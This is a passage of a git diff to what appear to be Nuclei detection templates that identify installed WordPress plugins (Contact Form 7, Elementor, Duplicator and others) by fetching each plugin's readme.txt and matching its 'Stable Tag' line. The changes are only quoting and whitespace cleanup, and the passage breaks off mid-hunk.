https://wordpress.org/plugins/complianz-gdpr/ metadata: plugin_namespace: complianz-gdpr - wpscan: https://wpscan.com/plugin/complianz-gdpr + wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml b/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml index f69534992d..076c47e6e2 100644 --- a/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml +++ b/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml @@ -1,4 +1,3 @@ - id: wordpress-contact-form-7-honeypot info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: plugin_namespace: contact-form-7-honeypot - wpscan: https://wpscan.com/plugin/contact-form-7-honeypot + wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-contact-form-7.yaml b/technologies/wordpress/wordpress-contact-form-7.yaml index 4691b6ded0..67618ffbc5 100644 --- a/technologies/wordpress/wordpress-contact-form-7.yaml +++ b/technologies/wordpress/wordpress-contact-form-7.yaml @@ -1,4 +1,3 @@ - id: wordpress-contact-form-7 info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/contact-form-7/ metadata: plugin_namespace: contact-form-7 - wpscan: https://wpscan.com/plugin/contact-form-7 + wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-contact-form-cfdb7.yaml b/technologies/wordpress/wordpress-contact-form-cfdb7.yaml index 0909866f0b..10df2b040e 100644 --- a/technologies/wordpress/wordpress-contact-form-cfdb7.yaml +++ b/technologies/wordpress/wordpress-contact-form-cfdb7.yaml @@ -1,4 +1,3 @@ - id: wordpress-contact-form-cfdb7 info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: plugin_namespace: contact-form-cfdb7 - wpscan: https://wpscan.com/plugin/contact-form-cfdb7 + wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-cookie-law-info.yaml b/technologies/wordpress/wordpress-cookie-law-info.yaml index a75c91f4ff..b5ba814447 100644 --- a/technologies/wordpress/wordpress-cookie-law-info.yaml +++ b/technologies/wordpress/wordpress-cookie-law-info.yaml @@ -1,4 +1,3 @@ - id: wordpress-cookie-law-info info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/cookie-law-info/ metadata: plugin_namespace: cookie-law-info - wpscan: https://wpscan.com/plugin/cookie-law-info + wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-cookie-notice.yaml b/technologies/wordpress/wordpress-cookie-notice.yaml index f1fe44e14f..f70e2f871b 100644 --- a/technologies/wordpress/wordpress-cookie-notice.yaml +++ b/technologies/wordpress/wordpress-cookie-notice.yaml @@ -1,4 +1,3 @@ - id: wordpress-cookie-notice info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/cookie-notice/ metadata: plugin_namespace: cookie-notice - wpscan: https://wpscan.com/plugin/cookie-notice + wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-creame-whatsapp-me.yaml b/technologies/wordpress/wordpress-creame-whatsapp-me.yaml index d68b2b7758..61a4b52899 100644 --- a/technologies/wordpress/wordpress-creame-whatsapp-me.yaml +++ b/technologies/wordpress/wordpress-creame-whatsapp-me.yaml @@ -1,4 +1,3 @@ - id: wordpress-creame-whatsapp-me info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: plugin_namespace: creame-whatsapp-me - wpscan: https://wpscan.com/plugin/creame-whatsapp-me + wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml b/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml index 6b969a027b..9f3d95c82f 100644 --- a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml +++ b/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml @@ -1,4 +1,3 @@ - id: wordpress-creative-mail-by-constant-contact info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: plugin_namespace: creative-mail-by-constant-contact - wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact + wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-custom-css-js.yaml b/technologies/wordpress/wordpress-custom-css-js.yaml index e8e5780678..8c3a95a2a0 100644 --- a/technologies/wordpress/wordpress-custom-css-js.yaml +++ b/technologies/wordpress/wordpress-custom-css-js.yaml @@ -1,4 +1,3 @@ - id: wordpress-custom-css-js info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/custom-css-js/ metadata: plugin_namespace: custom-css-js - wpscan: https://wpscan.com/plugin/custom-css-js + wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-custom-fonts.yaml b/technologies/wordpress/wordpress-custom-fonts.yaml index 4b27804793..25938d2f50 100644 --- a/technologies/wordpress/wordpress-custom-fonts.yaml +++ b/technologies/wordpress/wordpress-custom-fonts.yaml @@ -1,4 +1,3 @@ - id: wordpress-custom-fonts info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/custom-fonts/ metadata: plugin_namespace: custom-fonts - wpscan: https://wpscan.com/plugin/custom-fonts + wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-custom-post-type-ui.yaml b/technologies/wordpress/wordpress-custom-post-type-ui.yaml index 6740839a05..62d2b194c6 100644 --- a/technologies/wordpress/wordpress-custom-post-type-ui.yaml +++ b/technologies/wordpress/wordpress-custom-post-type-ui.yaml @@ -1,4 +1,3 @@ - id: wordpress-custom-post-type-ui info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: plugin_namespace: custom-post-type-ui - wpscan: https://wpscan.com/plugin/custom-post-type-ui + wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-disable-comments.yaml b/technologies/wordpress/wordpress-disable-comments.yaml index e8546d1d17..f14beeb403 100644 --- a/technologies/wordpress/wordpress-disable-comments.yaml +++ b/technologies/wordpress/wordpress-disable-comments.yaml @@ -1,4 +1,3 @@ - id: wordpress-disable-comments info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/disable-comments/ metadata: plugin_namespace: disable-comments - wpscan: https://wpscan.com/plugin/disable-comments + wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-disable-gutenberg.yaml b/technologies/wordpress/wordpress-disable-gutenberg.yaml index a4e6773537..d1b5c670e8 100644 --- a/technologies/wordpress/wordpress-disable-gutenberg.yaml +++ b/technologies/wordpress/wordpress-disable-gutenberg.yaml @@ -1,4 +1,3 @@ - id: wordpress-disable-gutenberg info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/disable-gutenberg/ metadata: plugin_namespace: disable-gutenberg - wpscan: https://wpscan.com/plugin/disable-gutenberg + wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-duplicate-page.yaml b/technologies/wordpress/wordpress-duplicate-page.yaml index cecbe7e62f..ecb58b6d64 100644 --- a/technologies/wordpress/wordpress-duplicate-page.yaml +++ b/technologies/wordpress/wordpress-duplicate-page.yaml @@ -1,4 +1,3 @@ - id: wordpress-duplicate-page info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/duplicate-page/ metadata: plugin_namespace: duplicate-page - wpscan: https://wpscan.com/plugin/duplicate-page + wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-duplicate-post.yaml b/technologies/wordpress/wordpress-duplicate-post.yaml index 3eb4affafe..e485fb9e89 100644 --- a/technologies/wordpress/wordpress-duplicate-post.yaml +++ b/technologies/wordpress/wordpress-duplicate-post.yaml @@ -1,4 +1,3 @@ - id: wordpress-duplicate-post info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/duplicate-post/ metadata: plugin_namespace: duplicate-post - wpscan: https://wpscan.com/plugin/duplicate-post + wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-duplicator.yaml b/technologies/wordpress/wordpress-duplicator.yaml index 7baec1ca5c..83a2c36545 100644 --- a/technologies/wordpress/wordpress-duplicator.yaml +++ b/technologies/wordpress/wordpress-duplicator.yaml @@ -1,4 +1,3 @@ - id: wordpress-duplicator info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/duplicator/ metadata: plugin_namespace: duplicator - wpscan: https://wpscan.com/plugin/duplicator + wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml b/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml index d2e0b0312a..2c941a2ea0 100644 --- a/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml +++ b/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml @@ -1,4 +1,3 @@ - id: wordpress-duracelltomi-google-tag-manager info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: plugin_namespace: duracelltomi-google-tag-manager - wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager + wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-easy-fancybox.yaml b/technologies/wordpress/wordpress-easy-fancybox.yaml index 78599b120f..80f699863d 100644 --- a/technologies/wordpress/wordpress-easy-fancybox.yaml +++ b/technologies/wordpress/wordpress-easy-fancybox.yaml @@ -1,4 +1,3 @@ - id: wordpress-easy-fancybox info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/easy-fancybox/ metadata: plugin_namespace: easy-fancybox - wpscan: https://wpscan.com/plugin/easy-fancybox + wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/easy-fancybox/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-easy-google-fonts.yaml b/technologies/wordpress/wordpress-easy-google-fonts.yaml index ceb0af50e5..ceb8d5bfd7 100644 --- a/technologies/wordpress/wordpress-easy-google-fonts.yaml +++ b/technologies/wordpress/wordpress-easy-google-fonts.yaml @@ -1,4 +1,3 @@ - id: wordpress-easy-google-fonts info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/easy-google-fonts/ metadata: plugin_namespace: easy-google-fonts - wpscan: https://wpscan.com/plugin/easy-google-fonts + wpscan: https://wpscan.com/plugin/easy-google-fonts tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/easy-google-fonts/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-easy-table-of-contents.yaml b/technologies/wordpress/wordpress-easy-table-of-contents.yaml index 56f51a820c..1ff4066ab8 100644 --- a/technologies/wordpress/wordpress-easy-table-of-contents.yaml +++ b/technologies/wordpress/wordpress-easy-table-of-contents.yaml @@ -1,4 +1,3 @@ - id: wordpress-easy-table-of-contents info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: plugin_namespace: easy-table-of-contents - wpscan: https://wpscan.com/plugin/easy-table-of-contents + wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/easy-table-of-contents/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-easy-wp-smtp.yaml b/technologies/wordpress/wordpress-easy-wp-smtp.yaml index ffb1f6d674..13243444af 100644 --- a/technologies/wordpress/wordpress-easy-wp-smtp.yaml +++ b/technologies/wordpress/wordpress-easy-wp-smtp.yaml @@ -1,4 +1,3 @@ - id: wordpress-easy-wp-smtp info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: plugin_namespace: easy-wp-smtp - wpscan: https://wpscan.com/plugin/easy-wp-smtp + wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-elementor.yaml b/technologies/wordpress/wordpress-elementor.yaml index f163cce1e4..e387d6f34d 100644 --- a/technologies/wordpress/wordpress-elementor.yaml +++ b/technologies/wordpress/wordpress-elementor.yaml @@ -1,4 +1,3 @@ - id: wordpress-elementor info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/elementor/ metadata: plugin_namespace: elementor - wpscan: https://wpscan.com/plugin/elementor + wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-elementskit-lite.yaml b/technologies/wordpress/wordpress-elementskit-lite.yaml index ed167ad2a6..4428d10603 100644 --- a/technologies/wordpress/wordpress-elementskit-lite.yaml +++ b/technologies/wordpress/wordpress-elementskit-lite.yaml @@ -1,4 +1,3 @@ - id: wordpress-elementskit-lite info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/elementskit-lite/ metadata: plugin_namespace: elementskit-lite - wpscan: https://wpscan.com/plugin/elementskit-lite + wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/elementskit-lite/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-enable-media-replace.yaml b/technologies/wordpress/wordpress-enable-media-replace.yaml index f672a793ba..95f8e6d92b 100644 --- a/technologies/wordpress/wordpress-enable-media-replace.yaml +++ b/technologies/wordpress/wordpress-enable-media-replace.yaml @@ -1,4 +1,3 @@ - id: wordpress-enable-media-replace info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/enable-media-replace/ metadata: plugin_namespace: enable-media-replace - wpscan: https://wpscan.com/plugin/enable-media-replace + wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/enable-media-replace/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-envato-elements.yaml b/technologies/wordpress/wordpress-envato-elements.yaml index 6b489a4391..8e7f60a3f7 100644 --- a/technologies/wordpress/wordpress-envato-elements.yaml +++ b/technologies/wordpress/wordpress-envato-elements.yaml @@ -1,4 +1,3 @@ - id: wordpress-envato-elements info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/envato-elements/ metadata: plugin_namespace: envato-elements - wpscan: https://wpscan.com/plugin/envato-elements + wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/envato-elements/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml b/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml index 398276b712..1ab812b653 100644 --- a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml +++ b/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml @@ -1,4 +1,3 @@ - id: wordpress-essential-addons-for-elementor-lite info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: plugin_namespace: essential-addons-for-elementor-lite - wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite + wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-ewww-image-optimizer.yaml b/technologies/wordpress/wordpress-ewww-image-optimizer.yaml index 49e3ed6631..178364595f 100644 --- a/technologies/wordpress/wordpress-ewww-image-optimizer.yaml +++ b/technologies/wordpress/wordpress-ewww-image-optimizer.yaml @@ -1,4 +1,3 @@ - id: wordpress-ewww-image-optimizer info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: plugin_namespace: ewww-image-optimizer - wpscan: https://wpscan.com/plugin/ewww-image-optimizer + wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ewww-image-optimizer/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml b/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml index 49ad57b6bc..868ee5f52a 100644 --- a/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml +++ b/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml @@ -1,4 +1,3 @@ - id: wordpress-facebook-for-woocommerce info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: plugin_namespace: facebook-for-woocommerce - wpscan: https://wpscan.com/plugin/facebook-for-woocommerce + wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/facebook-for-woocommerce/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml b/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml index 2a34441578..e95d592ec2 100644 --- a/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml +++ b/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml @@ -1,4 +1,3 @@ - id: wordpress-favicon-by-realfavicongenerator info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: plugin_namespace: favicon-by-realfavicongenerator - wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator + wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/favicon-by-realfavicongenerator/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-flamingo.yaml b/technologies/wordpress/wordpress-flamingo.yaml index dd06f63933..64ce97eee8 100644 --- a/technologies/wordpress/wordpress-flamingo.yaml +++ b/technologies/wordpress/wordpress-flamingo.yaml @@ -1,4 +1,3 @@ - id: wordpress-flamingo info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/flamingo/ metadata: plugin_namespace: flamingo - wpscan: https://wpscan.com/plugin/flamingo + wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/flamingo/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-fluentform.yaml b/technologies/wordpress/wordpress-fluentform.yaml index 7aab325308..c26811de72 100644 --- a/technologies/wordpress/wordpress-fluentform.yaml +++ b/technologies/wordpress/wordpress-fluentform.yaml @@ -1,4 +1,3 @@ - id: wordpress-fluentform info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/fluentform/ metadata: plugin_namespace: fluentform - wpscan: https://wpscan.com/plugin/fluentform + wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-font-awesome.yaml b/technologies/wordpress/wordpress-font-awesome.yaml index 0a3089d8f1..03391a8f3e 100644 --- a/technologies/wordpress/wordpress-font-awesome.yaml +++ b/technologies/wordpress/wordpress-font-awesome.yaml @@ -1,4 +1,3 @@ - id: wordpress-font-awesome info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/font-awesome/ metadata: plugin_namespace: font-awesome - wpscan: https://wpscan.com/plugin/font-awesome + wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/font-awesome/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml b/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml index 6aa61b906f..80beef5ef4 100644 --- a/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml +++ b/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml @@ -1,4 +1,3 @@ - id: wordpress-force-regenerate-thumbnails info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: plugin_namespace: force-regenerate-thumbnails - wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails + wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/force-regenerate-thumbnails/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-formidable.yaml b/technologies/wordpress/wordpress-formidable.yaml index d977966c8b..912c8cfb4b 100644 --- a/technologies/wordpress/wordpress-formidable.yaml +++ b/technologies/wordpress/wordpress-formidable.yaml @@ -1,4 +1,3 @@ - id: wordpress-formidable info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/formidable/ metadata: plugin_namespace: formidable - wpscan: https://wpscan.com/plugin/formidable + wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - 